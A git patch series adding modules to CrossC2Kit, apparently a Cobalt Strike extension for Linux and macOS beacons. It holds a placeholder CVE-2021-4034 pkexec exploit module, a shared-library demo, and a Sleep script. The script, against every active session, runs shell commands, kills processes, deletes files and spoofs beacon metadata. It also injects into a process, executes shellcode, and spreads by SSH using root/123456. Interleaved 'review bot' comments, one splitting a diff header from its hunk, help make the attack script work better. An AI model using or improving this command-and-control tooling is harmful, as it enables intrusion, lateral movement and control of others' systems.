From 3fd511eb3630975752bfdd44bb2586db14c0fbcb Mon Sep 17 00:00:00 2001
From: gloxec
Date: Mon, 6 Jun 2022 17:37:46 +0800
Subject: [PATCH 1/3] demo template
---
third-party/lpe/CVE-2021-4034/load.cna | 3 ++
third-party/lpe/CVE-2021-4034/readme.md | 9 +++++
third-party/lpe/CVE-2021-4034/src/exp.c | 6 ++++
third-party/lpe/CVE-2021-4034/src/makefile | 38 +++++++++++++++++++++
third-party/utils/library_demo/load.cna | 3 ++
third-party/utils/library_demo/readme.md | 10 ++++++
third-party/utils/library_demo/src/makefile | 38 +++++++++++++++++++++
third-party/utils/library_demo/src/test1.c | 5 +++
8 files changed, 112 insertions(+)
create mode 100644 third-party/lpe/CVE-2021-4034/load.cna
create mode 100755 third-party/lpe/CVE-2021-4034/readme.md
create mode 100755 third-party/lpe/CVE-2021-4034/src/exp.c
create mode 100644 third-party/lpe/CVE-2021-4034/src/makefile
create mode 100644 third-party/utils/library_demo/load.cna
create mode 100755 third-party/utils/library_demo/readme.md
create mode 100755 third-party/utils/library_demo/src/makefile
create mode 100755 third-party/utils/library_demo/src/test1.c
diff --git a/third-party/lpe/CVE-2021-4034/load.cna b/third-party/lpe/CVE-2021-4034/load.cna
new file mode 100644
index 0000000..6cb3e01
--- /dev/null
+++ b/third-party/lpe/CVE-2021-4034/load.cna
@@ -0,0 +1,3 @@
+println("cve-2021-4034/load.cna");
+println("use exp.linux");
+println("use exp.mac");
\ No newline at end of file
diff --git a/third-party/lpe/CVE-2021-4034/readme.md b/third-party/lpe/CVE-2021-4034/readme.md
new file mode 100755
index 0000000..4d19b6d
--- /dev/null
+++ b/third-party/lpe/CVE-2021-4034/readme.md
@@ -0,0 +1,9 @@
+# CVE-2021-4034 polkit pkexec LPE
+
+# this module support MacOS & Linux
+
+# 编译 ELF & MachO 可执行文件 demo
+
+cve-2021-4034 ->
+ exp.linux
+ exp.mac
\ No newline at end of file
diff --git a/third-party/lpe/CVE-2021-4034/src/exp.c b/third-party/lpe/CVE-2021-4034/src/exp.c
new file mode 100755
index 0000000..3c690d4
--- /dev/null
+++ b/third-party/lpe/CVE-2021-4034/src/exp.c
@@ -0,0 +1,6 @@
+#include
+
+int main(int argc, char **argv) {
+ printf("hello, this is CVE-2021-4034 demo");
+ return 0;
+}
\ No newline at end of file
diff --git a/third-party/lpe/CVE-2021-4034/src/makefile b/third-party/lpe/CVE-2021-4034/src/makefile
new file mode 100644
index 0000000..a75acad
--- /dev/null
+++ b/third-party/lpe/CVE-2021-4034/src/makefile
@@ -0,0 +1,38 @@
+TARGET_Linux = exp.linux
+TARGET_Mac = exp.mac
+TARGET_shared = false
+
+ifeq ($(OS),Windows_NT)
+ ARCH := Windows
+else
+ ARCH := $(shell uname -s)
+endif
+
+ifeq ($(ARCH), Linux)
+ target = $(TARGET_Linux)
+ readSymbol = strings $(target) | grep GLIBC
+endif
+ifeq ($(ARCH), Darwin)
+ target = $(TARGET_Mac)
+endif
+
+ifeq ($(TARGET_shared), true)
+ CC_CFLAGS = -shared
+else
+ CC_CFLAGS =
+endif
+
+all: $(target)
+ @echo "----------------- nm ---------------------"
+ nm $(target)
+ @echo "------------------------------------------"
+ @echo "---------------- GLIBC -------------------"
+ $(readSymbol)
+ @echo "------------------------------------------"
+ cp $(target) ../
+
+$(target): exp.o
+ gcc $^ $(CC_CFLAGS) -o $@
+
+clean:
+ rm $(target) *.o
\ No newline at end of file
diff --git a/third-party/utils/library_demo/load.cna b/third-party/utils/library_demo/load.cna
new file mode 100644
index 0000000..59f86a6
--- /dev/null
+++ b/third-party/utils/library_demo/load.cna
@@ -0,0 +1,3 @@
+println("library_demo/load.cna");
+println("use libtest1.linux");
+println("use libtest1.mac");
\ No newline at end of file
diff --git a/third-party/utils/library_demo/readme.md b/third-party/utils/library_demo/readme.md
new file mode 100755
index 0000000..c90695a
--- /dev/null
+++ b/third-party/utils/library_demo/readme.md
@@ -0,0 +1,10 @@
+# CVE-2021-4034 polkit pkexec LPE
+
+# this module support MacOS & Linux
+
+# 编译 Linux & MacOS 动态库文件 demo
+
+
+demo_a.txt ->
+ libtest1.linux
+ libtest1.mac
\ No newline at end of file
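Review bot: The `#include` on the first added line of exp.c carries no header name as rendered, so the file as shown fails to preprocess and `printf` has no prototype; if `<stdio.h>` was lost in rendering this is moot, otherwise it needs restoring. The message in `printf` has no trailing `\n`, so when stdout is a pipe (presumably the case when a beacon captures the stub's output) the text sits in the stdio buffer until exit and is easy to mistake for "no output"; `printf("hello, this is CVE-2021-4034 demo\n");`. `argc`/`argv` are unused, which `-Wextra` flags; use `int main(void)` or `(void)argc; (void)argv;`. Because the makefile copies this binary to `exp.linux`/`exp.mac` inside a module named after a real pkexec LPE, a header comment such as `/* placeholder only - not an exploit for CVE-2021-4034; replace before deployment */` would keep the stub from being shipped or catalogued as the real thing.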
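Review bot: `target` is assigned only in the `Linux` and `Darwin` branches, so on the `Windows` branch this file itself sets up, or any other `uname -s`, `all: $(target)` degrades to `all:` with no prerequisite and the recipe runs `nm` and `cp` against an empty name; add, after the Darwin block, `ifeq ($(target),)` / `$(error unsupported platform: $(ARCH))` / `endif`. `readSymbol` is likewise unset on Darwin, so the GLIBC section is silently empty there, which is fine but deserves a comment such as `# GLIBC symbol check is Linux-only`. `clean` runs `rm $(target) *.o` without `-f` and fails on a clean tree; `rm -f $(target) *.o`. The `strings … | grep GLIBC` output is informational only: if the purpose is to confirm the payload's glibc baseline against the target, nothing here fails the build when a too-new `GLIBC_2.xx` symbol shows up, and `gcc` is hard-coded where `$(CC)` would let the operator point at a cross toolchain.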
diff --git a/third-party/utils/library_demo/src/makefile b/third-party/utils/library_demo/src/makefile
new file mode 100755
index 0000000..221c3b9
--- /dev/null
+++ b/third-party/utils/library_demo/src/makefile
@@ -0,0 +1,38 @@
+TARGET_Linux = libtest1.linux
+TARGET_Mac = libtest1.mac
+TARGET_shared = true
+
+ifeq ($(OS),Windows_NT)
+ ARCH := Windows
+else
+ ARCH := $(shell uname -s)
+endif
+
+ifeq ($(ARCH), Linux)
+ target = $(TARGET_Linux)
+ readSymbol = strings $(target) | grep GLIBC
+endif
+ifeq ($(ARCH), Darwin)
+ target = $(TARGET_Mac)
+endif
+
+ifeq ($(TARGET_shared), true)
+ CC_CFLAGS = -shared
+else
+ CC_CFLAGS =
+endif
+
+all: $(target)
+ @echo "----------------- nm ---------------------"
+ nm $(target)
+ @echo "------------------------------------------"
+ @echo "---------------- GLIBC -------------------"
+ $(readSymbol)
+ @echo "------------------------------------------"
+ cp $(target) ../
+
+$(target): test1.o
+ gcc $^ $(CC_CFLAGS) -o $@
+
+clean:
+ rm $(target) *.o
\ No newline at end of file
diff --git a/third-party/utils/library_demo/src/test1.c b/third-party/utils/library_demo/src/test1.c
new file mode 100755
index 0000000..10063c8
--- /dev/null
+++ b/third-party/utils/library_demo/src/test1.c
@@ -0,0 +1,5 @@
+#include
+
+void func1(int argc, char **argv) {
+ printf("hello, this is library demo\n");
+}
\ No newline at end of file
From 2cd5a74dc05b4d6384ec5610f374ae199d5bc841 Mon Sep 17 00:00:00 2001
From: gloxec
Date: Mon, 6 Jun 2022 17:48:39 +0800
Subject: [PATCH 2/3] CrossC2Kit API demo
---
third-party/api_demo/load.cna | 86 +++++++++++++++++++++++++++++++++++
1 file changed, 86 insertions(+)
create mode 100644 third-party/api_demo/load.cna
diff --git a/third-party/api_demo/load.cna b/third-party/api_demo/load.cna
new file mode 100644
index 0000000..f861a69
--- /dev/null
+++ b/third-party/api_demo/load.cna
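Review bot: With `TARGET_shared = true` the link step passes `-shared`, but `test1.o` is produced by make's implicit `.c.o` rule with `CFLAGS` unset, so nothing asks the compiler for position-independent code; on a toolchain that does not default to PIE the link fails with "recompile with -fPIC", and even where it happens to succeed the flag should be explicit. Add `CFLAGS += -fPIC` under `ifeq ($(TARGET_shared), true)` so the implicit rule picks it up. As in the sibling makefile, `target` is empty on any platform other than Linux/Darwin, so `all:` silently loses its prerequisite; `ifeq ($(target),)` / `$(error unsupported platform: $(ARCH))` / `endif` turns that into a build error, and `clean` should use `rm -f`. This makefile duplicates the CVE-2021-4034 one line for line apart from three variables; a shared `common.mk` included by both would stop the two from drifting.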
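Review bot: `func1` declares `argc`/`argv` but never reads them, and the `#include` on the first line names no header as rendered, so the file as shown fails to preprocess (disregard that part if `<stdio.h>` was dropped in rendering). If the signature is dictated by whatever loads this library into the beacon, say so above the function, e.g. `/* entry point called by the CrossC2 library loader; keep the (argc, argv) signature */` — the convention is not visible in this patch, so verify it — and silence the warning with `(void)argc; (void)argv;`. Since `printf` from a library loaded into another process writes to that process's stdout, the demo's output may never reach the operator; consider returning a value or writing through whatever result channel the loader exposes, if one exists.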
@@ -0,0 +1,86 @@
+
+println("---------- third party ----------------");
+
+sub callback_ls{
+ # $1 = beacon ID, $2 = the folder, $3 = results
+ $bid = $1;
+ $pwd = $2;
+ $res = $3;
+
+ blog($bid, @($pwd, $res));
+}
+
+sub callback_ps {
+ $bid = $1;
+ $res = $2;
+
+ blog($bid, @($res));
+}
+
+foreach $beacon (beacons()) {
+ if (!-isactive $beacon['id']) {
+ } else if (-isssh $beacon['id']) {
+ $bid = $beacon['id'];
+ blog($bid, "auto api test demo"); # 记录日志
+
+ bshell($bid, "echo \$AAA"); # 命令执行
+ bcc2_setenv($bid, "AAA", "ccc"); # 设置环境变量
+ bshell($bid, "echo \$AAA");
+
+ bcc2_unsetenv($bid, "AAA"); # 删除环境变量
+ bshell($bid, "echo \$AAA");
+
+ bsleep($bid, 2); # 设置休眠时间
+
+ btask($bid, "list dir"); # 记录执行任务
+ bls($bid, "./", &callback_ls); # 获取执行目录下的文件列表信息, 支持回调
+
+ btask($bid, "list process");
+ bps($bid, &callback_ps); # 获取进程信息, 支持回调
+
+ bpwd($bid); # <---------- teamserver ignore
+ bmkdir($bid, "/tmp/1234"); # 创建目录
+ bcd($bid, "/tmp/1234"); # 切换工作目录
+ bpwd($bid); # 获取工作目录
+
+ bkill($bid, 123); # 结束指定PID进程
+ brm($bid, "/tmp/1234/aaa"); # 删除文件 / 文件夹
+ # brm($bid, "/tmp/1234/bbb");
+
+ bsetostype($bid, "printer"); # 修改 beacon 元数据中的操作系统类型
+ bsetlocalip($bid, "10.0.0.1"); # 修改 beacon 元数据中的内网IP
+ bsethostname($bid, "test_hostname"); # 修改 beacon 元数据中的主机名称
+
+ # bcc2_inject($bid, $pid, $fileData, $temp_file_workpath);
+ # bshell($bid, "echo 0 > /proc/sys/kernel/yama/ptrace_scope");
+ bcc2_inject($bid, 1234, "aaaa", "/tmp/1234/"); # 向指定PID进程注入指定内容
+
+ # bssh_jump($bid, $username, $password, $privatekey, $passtype, $listener, $targetArray, $workspace);
+ bssh_jump($bid, "root", "123456", "", "ssh", "test_demo_cc2_listener", @("10.0.1.3", "10.0.1.4"), "/tmp/1234/"); # 向目标主机列表通过 SSH 协议,上线指定listener的beacon
+
+ $res = getSSHSession(); # 获取活跃状态的 CrossC2 会话
+ blog($bid, $res);
+
+ $res = getCrossC2Site(); # 获取服务端 CrossC2 beacon的下载地址
+ blog($bid, $res);
+
+ $res = getCrossC2Listener(); # 获取服务端配置的 CrossC2 监听器信息
+ blog($bid, $res);
+
+ $libbeacon =
getCrossC2Beacon("test_demo_cc2_listener", "lib"); # 从服务端指定 CrossC2 监听器中获取动态库类型 beacon
+ $beacon = getCrossC2Beacon("test_demo_cc2_listener", "main"); # 从服务端指定 CrossC2 监听器中获取可执行文件类型 beacon
+ $len_libbeacon = size($libbeacon);
+ $len_beacon = size($beacon);
+ blog($bid, "libbeacon size: $len_libbeacon");
+ blog($bid, "beacon size: $len_beacon");
+
+
+ bcc2_unsetenv($bid, "AAA")
+ bshell($bid, "export");
+
+
+ # run shellcode
+ bshellcode($bid, "\\x90\\x90\\x90\\x90"); # 指定会话中执行 shellcode
+
+ }
+}
\ No newline at end of file
From e5bcf1a60a829c80bf7cc139841c6ccac968a43b Mon Sep 17 00:00:00 2001
From: gloxec
Date: Mon, 6 Jun 2022 17:57:30 +0800
Subject: [PATCH 3/3] Update exp.c
---
third-party/lpe/CVE-2021-4034/src/exp.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/third-party/lpe/CVE-2021-4034/src/exp.c b/third-party/lpe/CVE-2021-4034/src/exp.c
index 3c690d4..6629a15 100755
--- a/third-party/lpe/CVE-2021-4034/src/exp.c
+++ b/third-party/lpe/CVE-2021-4034/src/exp.c
@@ -1,6 +1,6 @@
#include

int main(int argc, char **argv) {
- printf("hello, this is CVE-2021-4034 demo");
+ printf("hello, this is CVE-2021-4034 demo.");
return 0;
}
\ No newline at end of file
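Review bot: The `foreach $beacon (beacons())` block sits at top level of `load.cna`, so it executes when the script is loaded, and against every active SSH session it then runs `bkill($bid, 123)`, `brm`, `bcc2_inject(..., 1234, ...)`, `bshellcode`, the metadata rewrites `bsetostype`/`bsetlocalip`/`bsethostname`, and a `bssh_jump` with `root`/`123456` at 10.0.1.3-4 — on a live team server that kills arbitrary PIDs, corrupts session metadata and sprays a credential guess across the network with no operator confirmation. Make the demo an explicitly invoked `alias` that acts on the current beacon only (sketch below) and drop the loop; the `-isactive`/`-isssh` filter collapses to one guard. `bcc2_unsetenv($bid, "AAA")` a few lines before the end is missing its `;`, which Sleep will most likely reject as a syntax error before any of this runs. `"\\x90\\x90\\x90\\x90"` in a Sleep double-quoted string is the sixteen literal characters backslash-x-9-0, not four NOP bytes; if raw bytes are intended, load them from a file (`openf`/`readb`) or confirm that `bshellcode` accepts an escaped text form. The commented-out `echo 0 > /proc/sys/kernel/yama/ptrace_scope` disables a host hardening control system-wide and should not be left as a hint in a demo without a warning comment.
```sleep
# Operator-invoked: run `cc2_api_demo` from one beacon console instead of at script load.
alias cc2_api_demo {
    local('$bid $res $libbeacon $beacon $len_libbeacon $len_beacon');
    $bid = $1;
    if (!-isssh $bid) {
        berror($bid, "cc2_api_demo: expects an active CrossC2 SSH session");
        return;
    }
    blog($bid, "auto api test demo");
    # … unchanged: setenv/unsetenv, bls/bps with callbacks, mkdir/cd, inject, ssh_jump, getCrossC2* calls …
    bcc2_unsetenv($bid, "AAA");
    bshell($bid, "export");
    # … unchanged: bshellcode …
}
```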